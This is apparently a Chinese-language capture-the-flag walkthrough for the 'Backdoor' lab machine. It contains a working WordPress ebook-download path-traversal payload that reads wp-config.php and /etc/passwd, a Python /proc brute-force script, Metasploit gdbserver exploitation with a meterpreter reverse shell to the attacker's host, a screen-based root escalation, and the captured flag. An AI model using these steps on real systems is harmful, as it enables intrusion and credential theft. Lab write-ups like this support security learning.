自勉一句话:思维比工具更重要
内网靶场Backdoor
主要方向1:信息搜集(对目标的端口 服务 网站等进行扫描)
nmap普通扫描 端口开放80和22
nmap进行全端口扫描 多出来一个1337
nmap -sS -sC -p- --min-rate=5000 10.10.11.125
nmap漏洞模块的扫描:发现后台登录地址 以及用户admin
这里学习到 一般wordpress的后台登录地址都是域名下的wp-login.php
nikto扫描工具没有发现什么有用的信息
wpscan扫描工具 专门针对wordpress的网站 可以考虑测试一下
wpscan -h //查看帮助
wpscan --url xxx //针对目标url进行扫描
这里记录一下 新版python开启web服务的命令有所变化
python -m SimpleHTTPServer
python -m SimpleHTTPServer 8000
python3 -m http.server 8000
通过wpscan工具进行扫描
wpscan --url 10.10.11.125
wpscan发现的有效信息大致如下:
wpscan也可以用于探测存在的用户名
wpscan --url 10.10.11.125 -e u //可以用于探测可能存在的用户名
经过尝试可能能够利用的位置就是xmlrpc.php
这里存在可以利用的漏洞 具体详情可以参考:
https://blog.csdn.net/u012206617/article/details/109002948
但是经过尝试并没有发现可以利用的地方
接下来再尝试使用工具dirsearch进行一下扫描
多尝试尝试一些目录 发现一个可疑目录 /wp-content/plugins/
尝试wget对一些文件进行下载
最后只成功下载到了一个文件
然而并没有什么卵用 火大!!!!
查看 readme.txt 发现大致有个玩意版本是1.1
ebook插件的版本是1.1 尝试searchsploit
发现poc 可以直接查看到配置文件
10.10.11.125/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php
成功下载下来了配置文件
但是读取到mysql的信息以后并没有什么卵用
之后顺带读取一下/etc/passwd
回想起刚刚那个 1337端口 在谷歌搜索了一下
地址:
https://www.netspi.com/blog/technical/web-application-penetration-testing/directory-traversal-file-inclusion-proc-file-system/
根据提示 我们尝试自己写一个脚本去爆破这其中的内容
import requests
url = 'http://10.10.11.125/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc/{}/cmdline'
for i in range(0,1000):
target = url.format(str(i))
res = requests.get(target).text
if len(res) > 83:
print("PID:"+str(i)+" Content:"+res)
PID:852 Content:/proc/852/cmdline/proc/852/cmdline/proc/852/cmdline/bin/sh-cwhile true;do su user -c "cd /home/user;gdbserver --once 0.0.0.0:1337 /bin/true;"; done<script>window.close()</script>
PID:853 Content:/proc/853/cmdline/proc/853/cmdline/proc/853/cmdline/bin/sh-cwhile true;do sleep 1;find /var/run/screen/S-root/ -empty -exec screen -dmS root \;; done<script>window.close()</script>
这是一个以user运行的gdbserver进程 对应端口是1337 同时还有一个screen
接下来我们直接进入msfconsole 搜索关于gdbserver的漏洞进行利用
use exploit/multi/gdb/gdb_server_exec
set payload linux/x64/meterpreter/reverse_tcp
set RHOSTS 10.10.11.125
set RPORT 1337
set LHOST 10.10.14.118
set target 1
切记,本机ip要改成靶机能够识别到的地址 否则没办法上线 公网除外
此时已经成功上线了
接下来我们尝试suid提权
结合之前DC靶场攻略中有提到到screen的suid提权的方式
友情地址:
https://blog.csdn.net/weixin_51339377/article/details/123541296
不过这道题并不需要这么麻烦 已经有提示了
PID:853 Content:/proc/853/cmdline/proc/853/cmdline/proc/853/cmdline/bin/sh-cwhile true;do sleep 1;find /var/run/screen/S-root/ -empty -exec screen -dmS root \;; done<script>window.close()</script>
成功获得最终的flag
f9ba87f63f631010f56f9b7c0aa07599